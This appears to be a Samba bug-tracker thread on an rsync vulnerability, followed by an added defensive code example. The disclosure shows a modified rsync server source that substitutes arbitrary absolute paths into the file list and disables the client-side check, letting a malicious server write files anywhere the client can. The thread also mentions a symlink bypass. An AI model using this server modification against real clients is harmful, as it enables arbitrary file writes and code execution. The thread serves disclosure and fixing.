Created attachment 10433 [details]
Rsync path hijacking attack vulnerability.pdf (detailed documentation)

Hi all:

In the newest version of rsync, Baidu Security Team found a vulnerability which is similar to the wget FTP vulnerability CVE-2014-4877 (http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4877). When a client uses the parameter -a to synchronize files from the server side (the default), for example:

    rsync -avzP 127.0.0.1::share /tmp/share

rsync recursively synchronizes all files. An attacker can hijack the file path by modifying the code of the server side, which allows remote servers to write to arbitrary files, and consequently execute arbitrary code.

Vulnerability details:

First, I shared the following files in the rsync folder:

    [root@pentest rsync]# ls -lh
    total 8.0K
    -rw-r--r-- 1 root root    2 Oct 31 03:16 1.txt
    drwxr-xr-x 2 root root 4.0K Oct 31 05:17 truedir
    [root@pentest rsync]# cd truedir/
    [root@pentest truedir]# ls
    pwned
    [root@pentest truedir]# cat pwned
    rsync test
    [root@pentest truedir]#

Next, I modified the server code that sends the file list, so that in the process of synchronizing, the path of the file "pwned" can be intercepted and changed into any path.

file: flist.c, line 394

    static void send_file_entry(int f, const char *fname, struct file_struct *file,
    #ifdef SUPPORT_LINKS
                                const char *symlink_name, int symlink_len,
    #endif
                                int ndx, int first_ndx)
    {
            /* attacker's modification: replace the real name with any path */
            if (strcmp(fname, "truedir/pwned") == 0) {
                    fname = "/root/pwned.test"; /* arbitrary path */
            }

Then verification occurs on the server side and says "received request to transfer non-regular file /root/pwned.test 7 [sender]". But as an attacker, the code of the server side can be arbitrarily controlled, so the following code is disabled:

file: rsync.c, line 405

    /*
            if (iflags & ITEM_TRANSFER) {
                    int i = ndx - cur_flist->ndx_start;
                    if (i < 0 || !S_ISREG(cur_flist->files[i]->mode)) {
                            rprintf(FERROR, "received request to transfer non-regular file: %d [%s]\n",
                                    ndx, who_am_i());
                            exit_cleanup(RERR_PROTOCOL);
                    }
            }
    */

The file "pwned" will be downloaded into the forged path (/root/pwned.test).
In other words - a malicious rsync server can force a client to create any file in any path, as long as the client can write to that path? Indeed, an interesting find - and a security bug then.
(In reply to roland from comment #1)
Yes.
In your test, you didn't use 3.1.1 on the client side. This was fixed in that release:

    ABORTING due to unsafe pathname from sender: /root/pwned.test
That fix is these two commits, correct?

https://git.samba.org/?p=rsync.git;a=commit;h=371242e4e8150d4f9cc74cdf2d75d8250535175e
https://git.samba.org/?p=rsync.git;a=commit;h=4cad402ea8a91031f86c53961d78bb7f4f174790
(In reply to roland from comment #4) Yes, those are the commits for this bug.
(In reply to Wayne Davison from comment #3)
Yes! In the newest version of rsync (3.1.1), directly modifying the file path into an absolute path does not succeed in hijacking due to the security checks, but using symbolic links can still bypass the security checks and spoof the client. A new bug I submitted: https://bugzilla.samba.org/show_bug.cgi?id=10977
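The thread above establishes the core point: the receiving client must treat every file name the sender places in the file list as attacker-controlled, because the server's source can be modified freely (comment 0), and 3.1.1 aborts with "ABORTING due to unsafe pathname from sender" when it sees such a name (comment 3). The following is an added illustration of that kind of receiver-side check, written for this page; it is not rsync's own code from the commits linked in comment 4, and the function names `unsafe_pathname` and `accept_sender_name` and the sample names are assumptions made here. It rejects absolute names and any ".." component, which are the two lexical ways a sender can steer a write outside the destination directory.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Illustrative receiver-side check (not rsync's code). Every name in the
 * sender's file list is untrusted input: a modified server can send any
 * string, as the report in comment 0 shows. A name is unsafe if it is empty,
 * absolute, or contains a ".." path component. */
static bool unsafe_pathname(const char *fname)
{
    const char *p = fname;

    if (*p == '\0' || *p == '/')
        return true;            /* empty or absolute: never legitimate */

    for (;;) {
        const char *slash = strchr(p, '/');
        size_t len = slash ? (size_t)(slash - p) : strlen(p);

        /* exactly ".." as a component escapes the destination directory;
         * names such as "..pwned" are ordinary components and pass */
        if (len == 2 && p[0] == '.' && p[1] == '.')
            return true;
        if (!slash)
            break;
        p = slash + 1;
    }
    return false;
}

/* Returns 1 if the name may be used, 0 if the transfer must be aborted.
 * The message text mirrors what the 3.1.1 client prints (comment 3). */
static int accept_sender_name(const char *fname)
{
    if (unsafe_pathname(fname)) {
        fprintf(stderr, "ABORTING due to unsafe pathname from sender: %s\n", fname);
        return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed sample names: the benign name from the report, the absolute
     * path the modified server substituted, a traversal variant, and a
     * look-alike that is a legal component. */
    const char *names[] = {
        "truedir/pwned",
        "/root/pwned.test",
        "truedir/../../../root/pwned.test",
        "truedir/..pwned",
    };
    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++)
        printf("%-36s %s\n", names[i],
               accept_sender_name(names[i]) ? "ok" : "rejected");
    return 0;
}
```

This is a purely lexical check, and that is exactly its limit: as comment 6 points out, a sender can still send a symbolic link first and then a file whose path passes through it, so the receiver also has to consider what each component resolves to on disk, not only how the string looks.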